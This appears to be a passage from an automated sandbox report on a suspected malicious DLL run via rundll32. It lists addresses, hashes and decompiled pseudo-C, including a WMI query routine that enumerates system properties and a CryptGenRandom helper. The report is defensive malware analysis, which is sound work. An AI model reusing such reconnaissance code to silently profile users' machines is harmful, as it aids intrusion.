0x10003f21
0x10003f23
0x10003f27
0x10003f2c
0x10003f30
0x10003f36
0x10003f3b
0x10003f40
0x10003f40
0x10003f27
0x10003f4a
0x10003f54
0x10003f57
0x10003f5c
0x10003f60
0x10003f64
0x10003f6c
0x10003f7d
0x10003f7f
0x10003f82
0x10003f89
0x10003f94
0x10003f9c
0x10003fa0
0x10003faa
0x10003fac
0x10003faf
0x10003fb2
0x10003fb9
0x10003fc1
0x10003fce
0x10003fd0
0x10003fd7
0x10003fdf
0x10003fe3
0x10003fe7
0x10003ff1
0x10003ff5
0x10004000
0x10004000
0x10004008
0x10004008
0x10004014
0x1000401a
0x1000401e
0x100040bd
0x100040c1
0x10004162
0x00000000
0x10004162
0x100040c7
0x100040c9
0x100040cb
0x100040ce
0x100040d2
0x10004110
0x10004114
0x00000000
0x00000000
0x10004116
0x1000411b
0x00000000
0x00000000
0x1000411d
0x1000411f
0x10004122
0x1000412d
0x10004141
0x10004141
0x10004146
0x10004147
0x1000414a
0x1000414f
0x00000000
0x1000414f
0x100040d4
0x100040d9
0x00000000
0x00000000
0x100040db
0x100040dd
0x100040e0
0x100040eb
0x100040ff
0x100040ff
0x10004104
0x10004105
0x10004108
0x1000410d
0x00000000
0x10004152
0x10004152
0x10004153
0x10004156
0x10004159
0x00000000
0x10004024
0x10004024
0x10004026
0x10004028
0x1000402b
0x1000402f
0x1000406c
0x10004070
0x00000000
0x00000000
0x10004072
0x10004077
0x00000000
0x00000000
0x10004079
0x1000407b
0x1000407e
0x10004088
0x1000409c
0x1000409c
0x100040a1
0x100040a2
0x100040a5
0x100040aa
0x00000000
0x100040aa
0x10004031
0x10004036
0x00000000
0x00000000
0x10004038
0x1000403a
0x1000403d
0x10004047
0x1000405b
0x1000405b
0x10004060
0x10004061
0x10004064
0x10004069
0x00000000
0x100040ad
0x100040ad
0x100040ae
0x100040b1
0x100040b4
0x00000000
0x1000402b

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d302b8bed4a6726586d7796b05faaa06bc7d6ca5ee3a3c6dfd505f8b3c281936
Instruction ID: cf6ca6b42b56d04065e953f17323c7ec346a95c519199b254ba4ccf5b6d1ff2d
Opcode Fuzzy Hash: d302b8bed4a6726586d7796b05faaa06bc7d6ca5ee3a3c6dfd505f8b3c281936
Instruction Fuzzy Hash: ED91CFB5A007019BD721CF54C4C0AAAB3F1FF84388F12855DE59657A4ADB30F9C6CB64

Uniqueness

Uniqueness Score: -1.00%

Function 100175E0 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03508ef7a461b0c526fa3b6c724e9bbf49bec6aab501889d486f94ce8d0fe274
Instruction ID: d44f7d24b1c51bb840209d1562cceece2dd248818f645804ceb860721f1f5ec4
Opcode Fuzzy Hash: 03508ef7a461b0c526fa3b6c724e9bbf49bec6aab501889d486f94ce8d0fe274
Instruction Fuzzy Hash: C87185316205794FE704CF2ADCD143637A1F38E391386C519EA45CB395C638E566DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 10013BFA Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b179ebe0a10ae8f9bfd0736ee6230cb3998ab5049f657adb26191df387806924
Instruction ID: fad8c7b219dbfeeb7d3fd678287538bd172af9ecf68de129d89f71a81b13e65a
Opcode Fuzzy Hash: b179ebe0a10ae8f9bfd0736ee6230cb3998ab5049f657adb26191df387806924
Instruction Fuzzy Hash: D65168B3B041B00BDF68CE3E8C642757ED25AC505270EC2B6E9A9CF24AE878C7059760

Uniqueness

Uniqueness Score: -1.00%

Function 100011EB Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddd1ae92bcf80342cdd4ce101a03d61d7b050554caf2ba98792aacaa291ae89a
Instruction ID: ccdbadd7ba936380601ea3cbd651e1978539a031b4c4eed27f92f684b5335f8e
Opcode Fuzzy Hash: ddd1ae92bcf80342cdd4ce101a03d61d7b050554caf2ba98792aacaa291ae89a
Instruction Fuzzy Hash: 7B51D3B4E01228DFEB52CF68C9C0B99BBF0BB0E314F11816AE958E3311D335A9858F51

Uniqueness

Uniqueness Score: -1.00%

Function 047D222E Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000003.33834914479.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_47d0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e7cfee9437a444e8fc128acef361a85886a240b47ba43e2e0b88c7076991434
Instruction ID: d113023e40f4acf5d029e755a5cede17305a982d68d786674a265a3662e36929
Opcode Fuzzy Hash: 8e7cfee9437a444e8fc128acef361a85886a240b47ba43e2e0b88c7076991434
Instruction Fuzzy Hash: B241F9B5E24209DFCB54CF99C580AADB7F1BB08310F9940A5E805AB352E330FE82DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10015207 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 915d649be514e69a95b989d83612c341975e5e95291d22175ae017ea06cd4cf2
Instruction ID: d0fa73270d71585e7083f40233a42da0893e9660e5d16aed493464a71ca59f01
Opcode Fuzzy Hash: 915d649be514e69a95b989d83612c341975e5e95291d22175ae017ea06cd4cf2
Instruction Fuzzy Hash: 8B2171367154128BD35CCF2CD8A6A69F3A5FB49210F85427ED51BCB682CB72E492CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 693417F4 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f6ec2e13ef26ba2937adaa2fbb4dad4a63932638b2fe3b5a50e18eaf2d7e57
Instruction ID: 858b549502c8a1020fa0d23666debce769d8150b6a17ffa186c74a4d37e00801
Opcode Fuzzy Hash: c0f6ec2e13ef26ba2937adaa2fbb4dad4a63932638b2fe3b5a50e18eaf2d7e57
Instruction Fuzzy Hash: 72110939E41A08CFDB44CF98C190A98BBF5FB2CB14F924095E855AB762D332ED90CB55

Uniqueness

Uniqueness Score: -1.00%

Function 100026E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fa959bf55afc4f8d49bc31b5d3d751fe6b1c2fbb56e6436ccdfb01f05ea325b
Instruction ID: 8c55d59481a20edac22beb63bcdc80e93f7f59946f39b981f18aa1c6f739a984
Opcode Fuzzy Hash: 5fa959bf55afc4f8d49bc31b5d3d751fe6b1c2fbb56e6436ccdfb01f05ea325b
Instruction Fuzzy Hash: 63F04F316183826AF349CB788806F0A32C6EB402E0F348279E158CB1EAEEA0DA419304

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFB4 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000DFB4(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D972(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10009525(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000953B( &_v60, 0xfffffffe);
					E1000DA26( &_v104);
					return _t320;
				}
				_t165 = E1000948D(_t255, 0x578);
				 *_t328 = 0x9c5;
				_v52 = _t165;
				_t166 = E1000948D(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E10009DC8(_t165);
				_v60 = _t322;
				E1000A291( &_v52);
				E1000A291( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E1000948D(_t255, 0xa70);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E1000A291( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000953B( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E10009C2B(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E10009C2B(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E100095B9(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10009525( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000953B(_t136, 0);
								E1000953B( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E10009C2B(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E1000948D(_t281, 0x10ee);
								 *_t329 = 0x6bc;
								_t217 = E1000948D(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10009525(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E1000A291( &_v92);
											E1000A291( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E1000B76A();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10009525(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E1000948D(_t283, 0x9cc);
										E1000B76A( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E1000A291( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E10009C2B(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DE98( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000953B( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x1000dfbd
0x1000dfc3
0x1000dfca
0x1000dfcd
0x1000dfd0
0x1000dfd5
0x1000dfd7
0x1000dfdc
0x1000e424
0x1000e424
0x1000dfe9
0x1000dfeb
0x1000dfee
0x1000dff1
0x1000e409
0x1000e40f
0x1000e419
0x00000000
0x1000e41e
0x1000dffc
0x1000e003
0x1000e00a
0x1000e00d
0x1000e012
0x1000e014
0x1000e017
0x1000e01a
0x1000e01b
0x1000e024
0x1000e02a
0x1000e02d
0x1000e036
0x1000e03b
0x1000e040
0x1000e057
0x1000e064
0x1000e067
0x1000e06e
0x1000e073
0x1000e07a
0x1000e07f
0x1000e086
0x1000e088
0x1000e094
0x1000e097
0x1000e099
0x1000e3f9
0x1000e3fa
0x1000e403
0x00000000
0x1000e403
0x1000e09f
0x1000e0a2
0x1000e0a5
0x1000e0a8
0x1000e0aa
0x1000e3c5
0x1000e3c8
0x1000e3cb
0x1000e3cd
0x1000e3ef
0x1000e3f4
0x1000e3cf
0x1000e3d2
0x1000e3dd
0x1000e3e4
0x1000e3e4
0x00000000
0x00000000
0x00000000
0x00000000
0x1000e0b0
0x1000e0b0
0x1000e0c2
0x1000e0c5
0x1000e0c7
0x00000000
0x00000000
0x1000e0cf
0x1000e0d2
0x1000e0d5
0x1000e0d8
0x1000e0db
0x1000e0de
0x00000000
0x00000000
0x1000e0e4
0x1000e0f2
0x1000e0f5
0x1000e0f7
0x1000e110
0x1000e11f
0x1000e127
0x1000e127
0x1000e12a
0x1000e131
0x1000e135
0x1000e13b
0x1000e13d
0x1000e3ad
0x1000e3b3
0x1000e3b9
0x1000e3bc
0x1000e3bc
0x00000000
0x1000e3bc
0x1000e14c
0x1000e160
0x1000e164
0x1000e166
0x1000e16b
0x1000e37a
0x1000e380
0x1000e38b
0x1000e396
0x1000e39c
0x1000e3a2
0x1000e3a5
0x00000000
0x1000e3a5
0x1000e171
0x1000e348
0x1000e348
0x1000e34b
0x1000e34e
0x00000000
0x00000000
0x1000e179
0x1000e181
0x1000e188
0x1000e18e
0x1000e190
0x00000000
0x00000000
0x1000e199
0x1000e1ae
0x1000e1b4
0x1000e1bd
0x1000e1c0
0x1000e1c3
0x1000e1c5
0x1000e33b
0x1000e33e
0x1000e347
0x1000e347
0x00000000
0x1000e347
0x1000e1d5
0x1000e1d8
0x1000e1df
0x1000e1e5
0x1000e1e8
0x1000e1eb
0x1000e1ee
0x1000e1f1
0x1000e22d
0x1000e22d
0x1000e230
0x1000e2dc
0x1000e2f0
0x1000e300
0x1000e304
0x1000e306
0x1000e31d
0x1000e321
0x1000e32a
0x1000e335
0x00000000
0x1000e335
0x1000e30c
0x1000e30d
0x1000e312
0x1000e312
0x1000e314
0x1000e315
0x1000e31a
0x00000000
0x1000e31a
0x1000e236
0x1000e236
0x1000e239
0x1000e2a4
0x1000e2b8
0x1000e2c8
0x1000e2cc
0x1000e2ce
0x00000000
0x00000000
0x1000e2d4
0x1000e2d5
0x00000000
0x1000e2d5
0x1000e23b
0x1000e23b
0x1000e23e
0x00000000
0x00000000
0x1000e240
0x1000e243
0x00000000
0x00000000
0x1000e245
0x1000e245
0x1000e24b
0x1000e267
0x1000e276
0x1000e27f
0x1000e284
0x1000e287
0x1000e28d
0x1000e28d
0x1000e292
0x1000e29e
0x00000000
0x1000e29e
0x1000e250
0x00000000
0x1000e250
0x1000e1f3
0x1000e21a
0x1000e21f
0x1000e224
0x1000e226
0x1000e226
0x00000000
0x1000e224
0x1000e1f5
0x1000e1f5
0x1000e1f8
0x00000000
0x00000000
0x1000e1fe
0x1000e1fe
0x1000e201
0x00000000
0x00000000
0x1000e207
0x1000e207
0x1000e20a
0x00000000
0x00000000
0x1000e210
0x1000e213
0x00000000
0x00000000
0x1000e215
0x00000000
0x1000e215
0x1000e357
0x1000e35d
0x1000e363
0x1000e366
0x1000e369
0x1000e369
0x1000e36c
0x1000e36d
0x1000e370
0x1000e372
0x00000000
0x00000000
0x1000e3c2
0x1000e3c2
0x00000000
0x1000e3c2
0x1000e0f9
0x1000e0ff
0x00000000
0x1000e0ff
0x1000e3bf
0x00000000
0x1000e042
0x1000e047
0x1000e04c
0x00000000
0x1000e050

APIs

Part of subcall function 1000D972: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D985
Part of subcall function 1000D972: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D996
Part of subcall function 1000D972: CoCreateInstance.OLE32(1001D928,00000000,00000001,1001D938,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9AD
Part of subcall function 1000D972: SysAllocString.OLEAUT32(00000000), ref: 1000D9B8
Part of subcall function 1000D972: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9E3

Part of subcall function 10009525: RtlAllocateHeap.76D4C8D1(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533

SysAllocString.OLEAUT32(00000000), ref: 1000E05D
SysAllocString.OLEAUT32(00000000), ref: 1000E071
SysFreeString.OLEAUT32(?), ref: 1000E3FA
SysFreeString.OLEAUT32(?), ref: 1000E403

Part of subcall function 1000953B: HeapFree.KERNEL32(00000000,00000000), ref: 10009581

Strings

TRUE, xrefs: 1000E21F
FALSE, xrefs: 1000E226

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: 1ca1a3504ed0376f267886d94587d7e8d7815c7b98ce9207ac68ce592b44425b
Instruction ID: 0fc0e3d576d83403318f50b99c476987941cb1918b05b8b85936d2293dab87e0
Opcode Fuzzy Hash: 1ca1a3504ed0376f267886d94587d7e8d7815c7b98ce9207ac68ce592b44425b
Instruction Fuzzy Hash: 44E17D75E00219AFEB05DFE4C885EAEBBB9FF49380F108159E505B7299DB31AE41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013B62 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E10013B62(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E10013ABD( &_v16);
				return 0;
			}

0x10013b68
0x10013b7a
0x10013b7e
0x10013bf2
0x00000000
0x10013bf4
0x10013b8e
0x10013b92
0x00000000
0x00000000
0x10013b9a
0x10013b9c
0x10013ba1
0x00000000
0x00000000
0x10013bab
0x10013baf
0x00000000
0x00000000
0x10013bb1
0x10013bb6
0x10013bb8
0x10013bba
0x10013bbf
0x10013bc4
0x00000000
0x00000000
0x10013bcf
0x10013bd9
0x10013bdd
0x00000000
0x00000000
0x10013bec
0x00000000

APIs

GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,10008511), ref: 10013B74
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 10013B8C
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 10013B9A
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 10013BA9

Strings

CryptAcquireContextA, xrefs: 10013B86
CryptGenRandom, xrefs: 10013B94
advapi32.dll, xrefs: 10013B6F
CryptReleaseContext, xrefs: 10013BA3

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

